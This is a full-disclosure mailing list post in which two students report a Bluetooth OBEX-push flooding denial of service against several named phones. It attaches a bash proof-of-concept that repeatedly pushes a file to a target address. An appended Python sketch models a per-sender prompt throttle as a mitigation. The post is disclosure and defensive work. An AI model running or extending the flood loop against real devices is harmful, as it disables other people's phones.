Re: [Full-disclosure] Bluetooth DoS by obex push [CORRECTED]



Sorry for some trouble with the last mail, I have corrected the text
(there were some possibly unreadable characters in it) and the
attachment is plain text now.


Hello,

during a course project studying security and privacy related to
Bluetooth, we discovered a simple but effective DoS attack using OBEX push.

Using ussp-push [1], it is possible to send out files very quickly. By
continuously trying to push a file, the target is flooded with prompts
whether to accept the file or not, which disables any other usage on the
phone, including the ability to turn off Bluetooth.
We confirmed the attack to work on the following phones (all tested ones!):

- Sony Ericsson K700i
- Nokia N70
- Motorola MOTORAZR V3
- Sony Ericsson W810i
- LG Chocolate KG800

and expect nearly all available phones with Bluetooth to be vulnerable
(in contrast to the previous DoS by l2ping).

A proof-of-concept code is attached, using ussp-push and targeting a
known MAC. This could be easily extended to target all visible devices.
Plus, a user could be forced to accept a possibly malicious file with
this attack. Using only one Bluetooth dongle, we were able to
practically disable three phones simultaneously.

Best regards,
Stefan Ekerfelt and Armin Hornung

[1] http://www.xmailserver.org/ussp-push.html
#!/bin/bash

checkOPUSH()
{
    MAC=$1
    OCHAN=$(sdptool search --bdaddr $MAC OPUSH | grep Channel:)
    if test "$OCHAN" != ""
    then
        OCHAN=$(echo $OCHAN | awk '/Channel:/ { print $2 }')
        return $OCHAN
    fi
    return 0
}


if test $# -ne 2
then
    echo "Usage: $0 <bdaddr> <filename>"
    exit 127
fi

MAC=$1
FILENAME=$2

checkOPUSH $1
OCHAN=$?

if test $OCHAN -eq 0
then
    echo "Couldn't connect to $MAC via OBEX push."
    exit 127
fi


while true
do
    ./ussp-push $MAC@$OCHAN $FILENAME $FILENAME
done
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
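
Added example (not part of the original post or its attachment): the flood works because every incoming push attempt raises a new accept/reject prompt, so one receiver-side mitigation is to throttle prompts per sender address and silently reject the rest. The sketch below replays constructed push attempts through such a throttle; the class name, thresholds and sample addresses are assumptions for illustration, not taken from any phone firmware.

```python
# Added illustration: per-sender throttle for incoming OBEX push prompts.
# All names and thresholds are assumptions, not taken from any phone firmware.
from collections import defaultdict, deque

class PushPromptThrottle:
    def __init__(self, max_prompts=3, window=60.0, base_block=120.0, max_block=3600.0):
        self.max_prompts = max_prompts      # prompts allowed per sender per window
        self.window = window                # sliding window length in seconds
        self.base_block = base_block        # first block duration in seconds
        self.max_block = max_block          # upper bound for the backoff
        self._recent = defaultdict(deque)   # bdaddr -> timestamps of prompts shown
        self._blocked_until = {}            # bdaddr -> time the block expires
        self._strikes = defaultdict(int)    # bdaddr -> number of blocks so far

    def should_prompt(self, bdaddr, now):
        """Return True if the user should be asked about this push request."""
        bdaddr = bdaddr.upper()
        if now < self._blocked_until.get(bdaddr, 0.0):
            return False                    # reject without raising a UI prompt
        recent = self._recent[bdaddr]
        while recent and now - recent[0] > self.window:
            recent.popleft()                # forget prompts outside the window
        if len(recent) >= self.max_prompts:
            # Too many prompts from one sender: block it, doubling each time.
            block = min(self.base_block * 2 ** self._strikes[bdaddr], self.max_block)
            self._strikes[bdaddr] += 1
            self._blocked_until[bdaddr] = now + block
            recent.clear()
            return False
        recent.append(now)
        return True

def replay(events, throttle=None):
    """Replay (timestamp, bdaddr) push attempts; return prompts shown per sender."""
    throttle = throttle or PushPromptThrottle()
    shown = defaultdict(int)
    for ts, bdaddr in events:
        if throttle.should_prompt(bdaddr, ts):
            shown[bdaddr] += 1
    return dict(shown)

# Constructed sample: one sender retrying twice a second for 10 minutes,
# and a second sender making a single transfer in the middle of it.
FLOOD = [(i * 0.5, "00:11:22:33:44:55") for i in range(1200)]
SAMPLE = sorted(FLOOD + [(42.0, "AA:BB:CC:DD:EE:FF")])

if __name__ == "__main__":
    print(replay(SAMPLE))
```

With these assumed thresholds the repeating sender produces 9 prompts instead of 1200 over the ten minutes, while the single transfer from the other address is still offered to the user.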
